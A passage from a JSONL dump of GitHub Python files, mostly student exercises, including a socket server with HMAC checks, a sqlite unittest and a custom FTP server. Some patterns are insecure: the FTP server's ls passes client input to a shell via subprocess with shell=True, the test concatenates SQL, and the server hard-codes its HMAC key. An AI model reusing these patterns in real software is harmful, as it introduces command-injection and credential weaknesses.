logging.info(\"shortest path: {}\".format(path))\n return len(path) - 1\n\n def solve_part_II(self):\n starting_points = [n for n in nx.nodes(self.G) if n[2] == 'a']\n paths = [] \n for sp in starting_points:\n try:\n path = nx.shortest_path(self.G, sp, self.end)\n paths.append(path)\n except nx.NetworkXNoPath as e:\n logging.info(\"exception occurred: {}\".format(e))\n \n logging.info(\"shortest paths from each a: {}\".format(paths))\n return min(len(p) for p in paths)-1\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n #logging.basicConfig(level=logging.DEBUG)\n hca = HillClimbingAlgorithm.read_input_file('input.txt')\n print(\"{} {}\".format(hca.solve_part_I(), hca.solve_part_II()))\n\n","repo_name":"frankschmitt/advent_of_code","sub_path":"2022/12-hill_climbing_algorithm/HillClimbingAlgorithm.py","file_name":"HillClimbingAlgorithm.py","file_ext":"py","file_size_in_byte":3658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"2624728920","text":"# serversocket.py\n\nimport hashlib\nimport socket\nimport hmac\n\nHOST = \"127.0.0.1\" # Standard loopback interface address (localhost)\nPORT = 3030 # Port to listen on (non-privileged ports are > 1023)\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, PORT))\n s.listen()\n conn, addr = s.accept()\n with conn:\n print(f\"Connected by {addr}\")\n while True:\n data = conn.recv(2048)\n if(len(data.decode('utf-8'))!=0):\n transf= data.decode('utf-8').split(\":\")[0]\n resumen=data.decode('utf-8').split(\":\")[1]\n nonce=data.decode('utf-8').split(\":\")[2]+\"\\n\"\n verifier= False\n with open(\"./almacenamiento/nonces.txt\", 'r+') as file:\n lines = file.readlines()\n if nonce not in lines:\n file.writelines(nonce)\n else:\n print(\"Transacción con NONCE repetido\")\n verifier= True\n maker=hmac.new(b\"1234567890\", bytes(transf,\"utf-8\"), hashlib.sha256)\n digest=maker.hexdigest()\n if(digest==resumen and verifier==False):\n print(\"Mensaje íntegro\")\n with open(\"./almacenamiento/transferencias.txt\", 'a+') as f:\n f.writelines(data.decode('utf-8').split(\":\")[0])\n else:\n print(\"Mensaje no íntegro\")\n if not data:\n break\n conn.sendall(data)","repo_name":"Security-Team-18/PAI2","sub_path":"serversocket.py","file_name":"serversocket.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71633621983","text":"from nltk.classify.util import accuracy\nfrom nltk.corpus import movie_reviews\n\nimport zaCode.ClassifierTrainer as ClassifierTrainer\nimport zaCode.Toolbox as Toolbox\n\n\ndef makePrediction():\n\n labels = movie_reviews.categories()\n print(\"Labels for reviews are: {}\\n\".format(labels) )\n\n labeled_words = [(label, movie_reviews.words(categories=[label])) for label in labels]\n print(\"Labeled words:{}\\n\".format(labeled_words[:10]))\n\n high_info_words = set(Toolbox.high_information_words(labeled_words))\n print(\"High information words:{}\\n\".format(list(high_info_words)[:10]))\n\n feat_det = lambda words: Toolbox.bag_of_words_in_set(words, high_info_words)\n\n lfeats = Toolbox.label_feats_from_corpus(movie_reviews, feature_detector=feat_det)\n\n train_feats, test_feats = Toolbox.split_label_feats(lfeats)\n\n mv_classifier = ClassifierTrainer.trainClassifier(train_feats)\n\n accuracyScore = accuracy(mv_classifier, test_feats)\n\n print(\"Accuracy is {}\".format(accuracyScore))\n\nif __name__ == '__main__':\n\n makePrediction()\n\n\n","repo_name":"Gliganu/FLT_SentimentAnalysis","sub_path":"zaCode/MainScript.py","file_name":"MainScript.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"38563774521","text":"import sqlite3\nimport unittest\n\nclass c1(unittest.TestCase):\n\n def setUp(self):\n self.con = sqlite3.connect(\"employee.db\")\n self.code =\"11\"\n self.name = \"akash\"\n def tearDown(self):\n self.code=\"0\"\n self.name = \"\"\n self.con.close()\n\n def test1(self):\n res = self.con.execute(\"SELECT empname FROM empdata WHERE empcode = \"+self.code)\n for i in res:\n fetchname =i[0]\n\n self.assertEqual(fetchname,self.name)\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"AK7795/psm","sub_path":"assign3.py","file_name":"assign3.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22939552485","text":"'''\r\nCotandor de caracteres, palabras o frases en un texto\r\n'''\r\ndef concatenarCaracteres():\r\n entrada_usuario = input(\"Ingrese una palabra o frase \").casefold().split() #Ojo a esta forma\r\n caracter_a_contar =input(\"Que caracter desea contar?\\n\").casefold()\r\n palabra_final = \"\".join(entrada_usuario)\r\n cuenta_caracter = palabra_final.count(caracter_a_contar)\r\n \r\n return f'Su palabra o frase inngresada es: {palabra_final}\\nEl caracter \"{caracter_a_contar}\"aparece {cuenta_caracter} veces.'\r\n\r\nprint(concatenarCaracteres())","repo_name":"folkearen/workspaceOL","sub_path":"Python/Ejericios propios/contadordecaracteres.py","file_name":"contadordecaracteres.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"24371633166","text":"'''\nGiven two strings S and T, return if they are equal when both are typed into empty text editors. # means a backspace character.\n\nExample 1:\n\nInput: S = \"ab#c\", T = \"ad#c\"\nOutput: true\nExplanation: Both S and T become \"ac\".\n\nNote:\n\n1 <= S.length <= 200\n1 <= T.length <= 200\nS and T only contain lowercase letters and '#' characters.\nFollow up:\n\nCan you solve it in O(N) time and O(1) space?\n\nhttps://leetcode.com/explore/challenge/card/30-day-leetcoding-challenge/529/week-2/3291/\n\n'''\nfrom typing import List\n\n\nclass Solution:\n\n def backspace(self, S):\n myList = []\n for each in S:\n if(each != '#'):\n myList.append(each)\n else:\n if(len(myList)): myList.pop()\n return (''.join(myList))\n\n def backspaceCompare(self, S: str, T: str) -> bool:\n return(self.backspace(S) == self.backspace(T))\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n S = \"a#c\"\n T = \"b\"\n print(sol.backspaceCompare(S, T))\n","repo_name":"arsaikia/Data_Structures_and_Algorithms","sub_path":"Data Structures and Algorithms/Python/LeetCode/Backspace String Compare.py","file_name":"Backspace String Compare.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71354953823","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author: DBQ(Du Baoqiang)\n\nimport socketserver,socket,time\nimport configparser,subprocess\nimport os,sys,hashlib,json,re\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom config import settings\nfrom lib import log\n\n\nclass ProgressBar():\n '''\n 进度条类\n '''\n def __init__(self, width=100):\n self.last_x = -1\n self.width = width\n\n def update(self, x):\n '''\n 进度条方法\n :param x:\n :return:\n '''\n if self.last_x == int(x): return False\n self.last_x = int(x)\n pointer = int(self.width * (x / 100.0))\n sys.stdout.write( '\\r%d%% [%s]' % (int(x), '#' * pointer + '.' * (self.width - pointer)))\n sys.stdout.flush()\n if x == 100: print()\n\n\ndef GetConfig(servertype,key):\n '''\n 获取配置文件中的参数的函数\n :param servertype: 接受用户传入一个类型,有两个字段, client和server\n :param key: key是接受用户传入的要获取的key值,如ip\n :return: 如果获取成功将return 获取的结果\n '''\n config = configparser.ConfigParser()\n config.read(settings.CONFIG,encoding='utf-8') #读取配置文件\n\n if config.has_section(servertype):\n return config.get(servertype,key)\n else:\n return False\n\n\ndef MD5(password):\n '''\n 用md5校验密码的函数\n :param password: 接受用户传入的一个密码\n :return: 返回一个hash过后的密码\n '''\n result = hashlib.md5(bytes('fe!49sKQe3Xe8',encoding='utf-8')) #添加填充字符,防止暴库\n result.update(bytes(password,encoding='utf-8'))\n\n return result.hexdigest() #return加密后的密码\n\n\ndef md5sum(filename):\n '''\n 文件完整性校验\n :param filename: 接受用户输入一个文件\n :return: 返回给用户一个值\n '''\n f = open(filename,'rb')\n content = f.read()\n f.close()\n\n m = hashlib.md5(content)\n file_md5 = m.hexdigest()\n\n return file_md5\n\n\nclass MyFtpServer(socketserver.BaseRequestHandler):\n '''\n FTPServer 类\n '''\n def handle(self):\n '''\n handle方法\n :return:\n '''\n welcome_msg = '''Connected to %s\\n220 (DBQ FTPServer %s)'''%(socket.gethostname(),settings.VERSION)\n server_respone = {'message':welcome_msg,\"hostname\":socket.gethostname()}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n self.login()\n self.task_run()\n\n\n def task_run(self):\n '''\n 服务器运行方法\n :return:\n '''\n while True:\n client_respone = self.request.recv(1024)\n if len(client_respone) == 0:continue\n\n client_respone_str = json.loads(client_respone.decode()) #接受客户端发送的指令和代码\n\n if client_respone_str.get(\"status\") == 220: #如果发送220代码,要退出登录\n res = self.logout(self.user) #退出登录\n if res:\n server_respone = {\"status\":221,\"message\":\"Goodbye!\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf8')) #成功退出,发送bye给客户端\n return True\n else:\n # task_data = json.loads(client_respone.decode())\n task_action = client_respone_str.get('action')\n if hasattr(self,task_action): #反射\n func = getattr(self,task_action)\n func(client_respone_str)\n # print(task_action,task_data)\n else:\n self.request.sendall(bytes('?Invalid command.-- %s'%client_respone.decode(),encoding='utf-8'))\n\n def put(self,*args,**kwargs):\n '''\n 上传文件到FTP服务器\n :return:\n '''\n filename = args[0].get('filename') #获取用户传过来的文件名\n filesize = args[0].get('file_size') #获取文件大小\n\n filepath = settings.USER_STATUS[self.user].get('currdir') #获取用户的当前路径\n\n userdb = json.load(open(settings.USERDB,'r')) #加载用户配置文件\n quota = settings.USER_STATUS[self.user].get('quota') #加载用户限额\n recv_size = 0 #初始一个用户接受到的大小为0\n\n try:\n if filesize + userdb[self.user].get('used') >= quota: #如果用户上传的文件加上现有使用空间大小大于用户配额的话\n server_respone = {\"status\":551,\"message\":\"The use dirsk space quota overrun.\"} #发送给用户551代码\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #发送服务器响应\n raise Exception('overrun quota') #超出磁盘配额,主动触发异常\n\n if os.path.exists(os.path.join(filepath,filename)): #如果服务器上存在目标文件,先判断是否接受完成\n if os.stat(os.path.join(filepath,filename)).st_size == filesize: #文件已经存在,并且接受完成\n server_respone = {\"status\":200,\"message\":\"Could not create file. remote file already exists.\"} #告诉客户端文件已存在,并且接受完成, 发送200代码\n else: #如果大小不等, 发送给用户,询问是否断点续传\n have_size = os.stat(os.path.join(filepath,filename)).st_size #已接受的文件大小\n server_respone = {\"status\":210,\"have_size\":have_size} #发送给客户端未接受完成(210)和 已接受到的大小\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #发送服务器响应给客户端\n\n client_respone_bytes = self.request.recv(1024) #接受用户的回应\n client_respone_str = json.loads(client_respone_bytes.decode() )\n\n if client_respone_str.get('status') == 211: #如果用户确认续传, 211\n server_respone = {\"status\":212,\"message\":\"Ok to send data.\"} #回送给用户一个确认值(ok)\n recv_size = have_size #重置变量recv_size为已经接收到的大小\n f = open(os.path.join(filepath,filename),'ab') #打开文件以追加形式打开\n elif client_respone_str.get('status') == 410: #如果客户端拒绝续传 410, 主动触发异常,并退出\n raise Exception('用户放弃操作')\n else:\n server_respone = {\"status\":150,\"message\":\"Ok to send data.\"}\n f = open(os.path.join(filepath,filename),'wb') #如果文件不存在,且配额满足需求,直接打开文件\n\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #发送服务器响应\n\n while recv_size < filesize:\n data = self.request.recv(2048)\n f.write(data)\n recv_size += len(data)\n f.close()\n server_recv_success_bytes = self.request.recv(1024) #接受用户传来的客户端文件校验值, 和发送文件文件代码\n server_recv_success_str = json.loads(server_recv_success_bytes.decode())\n\n md5_value = md5sum(os.path.join(filepath,filename)) #在服务器端也做校验\n\n if server_recv_success_str.get('md5sum') == md5_value and server_recv_success_str.get('status') == 225: #比对成功\n server_recv_success_confir = {\"status\":226} #226, 接受完成\n self.request.sendall(bytes(json.dumps(server_recv_success_confir),encoding='utf-8'))\n\n userdb[self.user]['used'] += recv_size #将用户已经使用的空间容量+=接受到的文件大小\n json.dump(userdb,open(settings.USERDB,'w')) #持久化到文件\n log.logger.info('226, %s upload %s success '%(self.user,filename))\n\n else:\n server_recv_success_confir = {\"status\":550,\"message\":\"File to accept successful but failed an integrity check\"}\n self.request.sendall(bytes(json.dumps(server_recv_success_confir),encoding='utf-8'))\n log.logger.info('%s upload %s failure, File to accept successful but failed an integrity check'%(self.user,filename))\n except Exception as e:\n return False\n\n def ls(self,*args,**kwargs):\n '''\n 列出目录下的文件和文件夹\n :param args:\n :param kwargs:\n :return:\n '''\n flag = args[0].get('dirname')\n cmd = args[0].get('action')\n if not flag: #如果用户没有输入列出的指定目录,\n # print('+'*30)\n Dirname = settings.USER_STATUS[self.user].get('currdir') #Dirname 为当前目录\n abs_path = Dirname #用户目录的绝对路径\n else:\n Dirname = flag #如果用户输入了,那么拼接一下\n abs_path = os.path.join(settings.USER_STATUS[self.user].get('currdir'),Dirname)\n\n if abs_path.count('..'):\n if os.path.abspath(abs_path).startswith(settings.USER_STATUS[self.user].get('homedir')):\n if os.path.exists(abs_path):\n command = subprocess.Popen('%s -lh %s'%(cmd,abs_path),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n command_out = command.stdout.read() #获取标准输出\n command_err = command.stderr.read() #获取错误输出\n\n if not command_err:\n send_data = command_out\n else:\n send_data = command_err\n\n server_respone = {\"size\":len(send_data),\"status\":150,\"message\":\"Here comes the directory listing.\"} #150 Here comes the directory listing.\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #发送给用户\n\n client_response_bytes = self.request.recv(1024) #接受用户端发送的确认码, 150+1\n client_response_str = json.loads(client_response_bytes.decode())\n\n if client_response_str.get(\"status\") == 151: #获取用户准备接受标志位\n self.request.sendall(send_data) #发送命令执行结果给用户\n server_send_success = {\"status\":226,\"message\":\"226 Directory send OK.\"} #发送完成确认给客户\n self.request.sendall(bytes(json.dumps(server_send_success),encoding='utf-8'))\n else:\n server_respone = {\"status\":250,\"message\":\"Not Found files or directory!\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #不存在\n else:\n data = {\"status\":403}\n self.request.sendall(bytes(json.dumps(data),encoding='utf-8')) #访问拒绝!\n\n elif abs_path.startswith(settings.USER_STATUS[self.user].get('homedir')):\n if os.path.exists(abs_path):\n command = subprocess.Popen('%s -lh %s'%(cmd,abs_path),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n command_out = command.stdout.read() #获取标准输出\n command_err = command.stderr.read() #获取错误输出\n if command_out:\n send_data = command_out\n else:\n send_data = command_err\n\n server_respone = {\"size\":len(send_data),\"status\":150,\"message\":\"Here comes the directory listing.\"} #150 Here comes the directory listing.\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #发送给用户\n\n client_respone_bytes = self.request.recv(1024)\n client_response_str = json.loads(client_respone_bytes.decode())\n\n if client_response_str.get(\"status\") == 151: #获取用户准备接受标志位\n self.request.sendall(send_data) #发送命令执行结果给用户\n server_send_success = {\"status\":226,\"message\":\"226 Directory send OK.\"} #发送完成确认给客户\n self.request.sendall(bytes(json.dumps(server_send_success),encoding='utf-8'))\n else:\n server_respone = {\"status\":250,\"message\":\"Not Found files or directory!\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #不存在\n else:\n data = {\"status\":403}\n self.request.sendall(bytes(json.dumps(data),encoding='utf-8')) #访问拒绝!\n\n def delete(self,*args,**kwargs):\n '''\n 删除目录下的文件和文件夹\n :param args:\n :param kwargs:\n :return:\n '''\n Dirname = args[0].get('dirname') #取出文件名\n abs_path = os.path.join(settings.USER_STATUS[self.user].get('currdir'),Dirname) #拼接一下\n\n userdb = json.load(open(settings.USERDB,'r')) #加载用户配置文件\n filesize = 0 #取出要删除文件的大小, 初始化一个值,然后在下面根据判断来更改\n\n if abs_path.count('..') or abs_path.startswith(settings.USER_STATUS[self.user].get('homedir')):\n if os.path.abspath(abs_path).startswith(settings.USER_STATUS[self.user].get('homedir')):\n if os.path.isdir(abs_path): #用户输入的是一个目录\n filesize = os.stat(abs_path).st_size\n try:\n os.rmdir(abs_path)\n server_respone = {\"status\":250,\"message\":\"Delete operation successful.\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n userdb[self.user]['used'] -= filesize #减少大小\n json.dump(userdb,open(settings.USERDB,'w')) #持久化到文件\n log.logger.info('250 %s del %s success, IP/Port: %s'%(self.user,Dirname,self.client_address))\n except OSError:\n server_respone = {\"status\":550,\"message\":\"Directory not empty: '%s'\"%Dirname}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n return False\n elif os.path.isfile(abs_path): #文件的操作\n filesize = os.stat(abs_path).st_size\n os.remove(abs_path)\n server_respone = {\"status\":250,\"message\":\"Delete operation successful.\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n userdb[self.user]['used'] -= filesize\n json.dump(userdb,open(settings.USERDB,'w'))\n log.logger.info('250 %s del %s success, IP/Port: %s'%(self.user,Dirname,self.client_address))\n else:\n data = {\"status\":404,\"message\":\"Delete operation failed, Not found file or directory!\"}\n self.request.sendall(bytes(json.dumps(data),encoding='utf-8')) #不存在\n log.logger.info('404 %s del %s falure, not fount file, IP/Port: %s'%(self.user,Dirname,self.client_address))\n else:\n server_respone = {\"status\":403,\"message\":\"Forbidden!\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #访问拒绝!\n log.logger.info('403 %s del %s operation not permitted! IP/Port: %s'%(self.user,Dirname,self.client_address))\n else:\n server_respone = {\"status\":403,\"message\":\"Forbidden!\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #访问拒绝!\n log.logger.info('403 %s del %s operation not permiitted, IP/port: %s'%(self.user,Dirname,self.client_address))\n\n def mkdir(self,*args,**kwargs):\n '''\n 创建文件夹\n :param args:\n :param kwargs:\n :return:\n '''\n Dirname = args[0].get('dirname') #取出文件名\n abs_path = os.path.join(settings.USER_STATUS[self.user].get('currdir'),Dirname) #拼接一下\n\n userdb = json.load(open(settings.USERDB,'r')) #打开用户自己的配置文件\n\n if not abs_path.startswith(settings.USER_STATUS[self.user].get('homedir')):\n server_respone = {\"status\":403,\"message\":\"Forbidden: Operation not permitted!\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #访问拒绝!\n log.logger.info('%s create %s operation not permitted, IP/Port: %s'%(self.user,Dirname,self.client_address))\n else:\n if os.path.abspath(abs_path).startswith(settings.USER_STATUS[self.user].get('homedir')):\n if not os.path.exists(abs_path):\n os.makedirs(abs_path)\n filesize = os.stat(abs_path).st_size\n server_respone = {\"status\":257,\"message\":\"'%s' created\"%Dirname}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n\n userdb[self.user]['used'] += filesize #用户使用大小+=文件夹大小, PS: 文件夹也占用空间的\n json.dump(userdb,open(settings.USERDB,'w'))\n\n log.logger.info('%s create dir %s successfully, IP/Port: %s'%(self.user,Dirname,self.client_address))\n else:\n server_respone = {\"status\":550,\"message\":\"Create directory operation failed, Target forlder already exists.\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #不存在\n log.logger.info('%s create dir %s failure, Target forlder already exists Tar, IP/Port: %s'%(self.user,Dirname,self.client_address))\n else:\n server_respone = {\"status\":403,\"message\":\"Forbidden: Operation not permitted!\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #访问拒绝!\n log.logger.info('%s created %s failure, Operation not permiited! IP/Port: %s'%(self.user,Dirname,self.client_address))\n\n def get(self,*args,**kwargs):\n '''\n 下载文件到本地\n :return:\n '''\n abs_filepath = args[0].get('filename') #获取用户要下载的文件名和绝对路径\n count_num = abs_filepath.count(os.sep) #根据系统平台统计是否还有相对路径,并用os.sep替换\n if count_num == 0: #如果用户输入的是一个\n filename = abs_filepath\n filepath = settings.USER_STATUS[self.user].get('currdir') #当前工作路径\n else:\n par_path = abs_filepath.split(os.sep)[:-1] #取出用户传入的目录的开头路径,取出来是个列表\n par_path_join = \"%s\"%os.sep.join(par_path) #在拼接一下成字符串\n filename = abs_filepath.split(os.sep)[-1] #取出文件名,需要发送给客户端\n filepath = os.path.join(settings.USER_STATUS[self.user].get('currdir'),par_path_join)\n try:\n if os.path.isfile(os.path.join(filepath,filename)):\n file_size = os.stat(os.path.join(filepath,filename)).st_size #发送单位为字节\n\n server_respone = {\"status\":150,\"filesize\":file_size,\"filename\":filename,\n \"message\":\"Opening BINARY mode data connection for %s (%s bytes)\"%(filename,file_size)}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #发送给用户一个找到文件的信息 包括: 文件大小和文件名给客户端\n\n response = self.request.recv(1024)\n client_respone = json.loads(response.decode())\n\n if client_respone.get('status') == 400: #客户端文件已存在\n return False\n elif client_respone['status'] == 401: #用户放弃续传\n return False\n elif client_respone['status'] == 210: #断点续传\n have_size = client_respone['have_size'] #获取已接受到的大小\n send_size = have_size\n elif client_respone['status'] == 200: #本地没有要下载的文件\n send_size = 0\n\n print('Transfer: ',filename)\n f = open(os.path.join(filepath,filename),'rb')\n f.seek(send_size) #改变文件指针从用户接受��的大小开始\n for line in f: #循环\n self.request.sendall(line) #发送\n send_size += len(line)\n\n print()\n f.close()\n #md5校验\n md5_value = md5sum(os.path.join(filepath,filename)) #服务器端计算出来一个md5值\n server_send_success = {\"status\":226,\"md5sum\":md5_value,\"message\":\"Transfer complete.\"} #发送给客户端响应代码和md5校验值\n self.request.sendall(bytes(json.dumps(server_send_success),encoding='utf-8'))\n\n client_recv_respone = self.request.recv(1024) #收取用户接受的情况\n client_recv_respone_str = json.loads(client_recv_respone.decode())\n if client_recv_respone_str.get('status') == 227:\n log.logger.info('226 %s download %s success'%(self.user,filename)) #记录日志\n else:\n log.logger.info('550 %s download %s failure'%(self.user,filename)) #记录日志\n\n elif os.path.isdir(os.path.join(filepath,filename)): #如果用户下载的是个目录的话\n server_respone = {\"status\":551,\"filename\":filename,\"message\":\"Can not download directory\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n else:\n server_respone = {\"status\":404,\"filename\":filename,\"message\":\"Not found remote file or directory!\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n except Exception as e:\n return False\n\n def login(self,*args,**kwargs):\n '''\n 用户登录方法\n :param user: 接受用户输入账号\n :param pwd: 接受用户传入密码\n :return: return 0: 表示认证成功, 1: 表示账户或者密码错误, 2, 表示用于已经登录,不能重复登录!\n '''\n flag = False\n while not flag:\n recv_user_info = self.request.recv(1024) #接受用户传入的账号密码\n if len(recv_user_info) == 0:break #如果为空,跳出循环\n user,pwd = recv_user_info.decode().split() #取出用户名和密码\n\n\n userdb = json.load(open(settings.USERDB,'r'))\n if user in userdb.keys():\n if user == userdb[user].get('username') and MD5(pwd) == userdb[user].get('password'):\n msg_data = {\"status\":230,\"message\":\"230 Login successful.\\nRemote system type is %s.\\nUsing binary mode to transfer files.\"%sys.platform.upper()}\n self.request.sendall(bytes(json.dumps(msg_data),encoding='utf-8'))\n if not os.path.isdir(os.path.join(settings.HOMEDIR,user)):\n os.mkdir(os.path.join(settings.HOMEDIR,user))\n if GetConfig(user,'quota'):\n defa_quota = GetConfig(user,'quota') #如果用户设置了单独的配额,使用用户配额, 并转换为字节\n quota = float(defa_quota)*1024*1024\n else:\n defa_quota = GetConfig('default','quota') #如果没设置单独的使用默认的,即400M, 并转换为字节\n quota = float(defa_quota)*1024*1024\n userdb = json.load(open(settings.USERDB,'r'))\n used = userdb[user].get('used')\n settings.USER_STATUS[user] = {'ip_port':self.client_address,\n 'username':user,\n 'homedir':os.path.join(settings.HOMEDIR,user),\n 'currdir':os.path.join(settings.HOMEDIR,user),\n 'quota':quota,\n 'used':used}\n self.user = user\n log.logger.info('230 %s login FTP server successfully, IP/Port: %s'%(user,self.client_address))\n flag = True #登录成功后退出循环\n else:\n msg_data = {\"status\":530,\"message\":\"530 Login incorrect.\\nftp: Login failed\"}\n self.request.sendall(bytes(json.dumps(msg_data),encoding='utf-8'))\n log.logger.info('530 %s log FTP server falure, username or passsword is incorrect'%user)\n else:\n msg_data = {\"status\":530,\"message\":\"530 Login incorrect.\\nftp: Login failed\"}\n self.request.sendall(bytes(json.dumps(msg_data),encoding='utf-8'))\n log.logger.info('530 %s log FTP server falure, username or passsword is incorrect'%user)\n\n def rename(self,*args,**kwargs):\n ''' 重命名文件/文件夹\n :param args:\n :param kwargs:\n :return:\n '''\n filename = args[0].get('filename') #获取用户要下载的文件名和��对路径\n newfilename = args[0].get('newname') #获取更改后的名字\n abs_filepath = os.path.join(settings.USER_STATUS[self.user].get('currdir'),filename)\n newfile_abs_filepath = os.path.join(settings.USER_STATUS[self.user].get('currdir'),newfilename)\n count_num = abs_filepath.count(os.sep) #根据系统平台统计是否还有相对路径,并用os.sep替换\n if os.path.exists(abs_filepath):\n if not os.path.exists(newfile_abs_filepath): #确认更改后的文件不存在\n server_respone = {\"status\":350,\"message\":\"Ready for RNTO.\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n client_respone_bytes = self.request.recv(1024)\n client_respone_str = json.loads(client_respone_bytes.decode())\n if client_respone_str.get('status') == 351:\n os.rename(abs_filepath,newfile_abs_filepath)\n rename_res = {\"status\":250,\"message\":\"Rename successful.\"}\n self.request.sendall(bytes(json.dumps(rename_res),encoding='utf-8'))\n log.logger.info('250 %s rename success, newname is %s'%(filename,newfilename))\n else:\n server_respone = {\"status\":401,\"message\":\"Target file already exists.\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n log.logger.info('401 %s rename failure, target file %s is already exists '%(filename,newfilename))\n else: #源文件不在\n server_respone = {\"status\":404,\"message\":\"Not Fount source file.\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n log.logger.info('404 %s rename failure, Not found source file'%filename)\n\n def logout(self,user):\n '''\n 注销用户方法\n :param user:\n :return:\n '''\n del settings.USER_STATUS[user] #删除用户全局变量中的值\n log.logger.info('220 %s logout FTP server'%user)\n return True\n\n def cd(self,*args,**kwargs):\n '''\n 服务器目录切换方法\n :param args:\n :param kwargs:\n :return:\n '''\n flag = args[0].get('dirname') #获取要改变的目录\n Dirname = flag if args[0].get('dirname') else settings.USER_STATUS[self.user].get('currdir') #用户列出的目录的相对路径\n abs_path = os.path.join(settings.USER_STATUS[self.user].get('currdir'),Dirname) #用户目录的绝对路径\n\n if abs_path.startswith(settings.USER_STATUS[self.user].get('homedir')):\n #如果切换的目录是以homedir开头,证明是用户家目录下的文件\n if os.path.isdir(abs_path):\n # os.chdir(abs_path) #切换目录\n settings.USER_STATUS[self.user]['currdir'] = os.path.abspath(abs_path) #改变当前目录变量\n msg_data = {\"status\":250,\"message\":\"250 Directory successfully changed.\"}\n self.request.sendall(bytes(json.dumps(msg_data),encoding='utf-8'))\n else:\n msg_data = {\"status\":550,\"message\":\"550 Failed to change directory.\"}\n self.request.sendall(bytes(json.dumps(msg_data),encoding='utf-8'))\n else:\n msg_data = {\"status\":403,\"message\":\"403 Forbidden to change directory.\"}\n self.request.sendall(bytes(json.dumps(msg_data),encoding='utf-8'))\n\n def pwd(self,*args,**kwargs):\n '''\n 打印当前所在目录\n :param args:\n :param kwargs:\n :return:\n '''\n pwd = settings.USER_STATUS[self.user].get('currdir')\n self.request.sendall(bytes(pwd,encoding='utf-8'))\n\n def system(self,*args,**kwargs):\n '''\n 列出当前系统平台\n :param args:\n :param kwargs:\n :return:\n '''\n Platfrom = sys.platform #获取当前系统平台\n server_respone = {\"status\":215,\"message\":\"Type: %s\"%Platfrom.upper()}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n\n def status(self,*args,**kwargs):\n '''\n 显示现有用户相关信息\n :param args:\n :param kwargs:\n :return:\n '''\n userdb = json.load(open(settings.USERDB,'r')) #打开用户自己的配置文件\n msg_data = '''\nConnected and logged into: %s\nUser Home: %s\nUser quota: %s MB\nUsed size: %.2f MB\nServer version: %s\n '''%(self.user,\n settings.USER_STATUS[self.user].get('homedir'),\n settings.USER_STATUS[self.user].get('quota')/1024/1024,\n userdb[self.user].get('used')/1024/1024,\n settings.VERSION,)\n self.request.sendall(bytes(msg_data,encoding='utf-8'))\n","repo_name":"daniel-vv/stu177101","sub_path":"day10/FTPServer/lib/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":30629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"32558624045","text":"import time\n\nfrom typing import Optional, Dict\n\n# from examples.RightWallPID import RightWallPID\nfrom PID import RightWallPID\nfrom simple_airsim.api import coordinate_system\nfrom simple_airsim.api.drone import Drone\nfrom simple_airsim.api.gui_manager import GUIManager\nfrom simple_airsim.api.manager import Manager\nfrom matplotlib import pyplot as plt\nimport examples.sim_data\n\nsim_time = 0\nemergency_threshold = 0.7\nfront_threshold = 3.0\nright_far_threshold = 0.3\ntunnel_threshold = 0.2\nHEIGHT_Z_AXIS = -2.045\nPRECISION = 0.0001\n\nFLIGHT_TIME_MIN = 8\nFLIGHT_SPEED = 0.35\n\ndrone_points = []\ngraph = []\n\n\ndef stick_to_right_wall(drone: Drone):\n right_wall_pid = RightWallPID(target=right_far_threshold)\n\n while True:\n lidars = drone.get_lidars()\n position = drone.get_position()\n orientation 